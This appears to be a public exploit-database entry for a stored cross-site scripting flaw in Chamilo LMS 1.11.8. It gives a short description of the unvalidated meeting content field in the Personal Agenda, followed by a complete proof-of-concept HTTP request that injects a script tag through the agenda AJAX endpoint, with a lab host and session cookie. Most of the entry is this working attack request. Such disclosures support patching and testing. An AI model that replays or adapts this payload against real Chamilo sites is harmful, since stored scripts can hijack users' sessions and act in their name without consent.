27 lines
No EOL
1.3 KiB
Text
27 lines
No EOL
1.3 KiB
Text
# Exploit Title: Chamilo LMS 1.11.8 - Cross-Site Scripting
|
|
# Author: Cakes
|
|
# Discovery Date: 2018-10-05
|
|
# Vendor Homepage: https://chamilo.org
|
|
# Software Link: https://github.com/chamilo/chamilo-lms/releases/download/v1.11.8/chamilo-1.11.8-php5.zip
|
|
# Tested Version: 1.11.8 for php5
|
|
# Tested on OS: Kali Linux
|
|
# CVE: N/A
|
|
|
|
# Description:
|
|
# Improper input validation on the Calendar / Personal Agenda page allows attackers add a persistent
|
|
# Cross-Site scripting attack to the meeting's content field when adding a new meeting.
|
|
# Simply intercept a new meeting request and add in the XSS
|
|
|
|
# PoC
|
|
|
|
GET /chamillo/main/inc/ajax/agenda.ajax.php?type=personal&a=add_event&start=2018-10-05%2000:00:00&end=2018-10-06%2000:00:00&all_day=true&view=month&title=Important+Info&content=%3Cp%3E<script>alert("Cakes");</script>%3C%2Fp%3E%0D%0A&_qf__form= HTTP/1.1
|
|
Host: 10.0.0.16
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
|
|
Accept: */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
DNT: 1
|
|
X-Requested-With: XMLHttpRequest
|
|
Referer: http://10.0.0.16/chamillo/main/calendar/agenda_js.php?type=personal
|
|
Cookie: defaultMyCourseView3=0; ch_sid=04uo1hmqp7e49f8l36e6s9oit1; agenda_cookies={%22view%22:%22month%22%2C%22start%22:%222018-10-01%22}
|
|
Connection: close |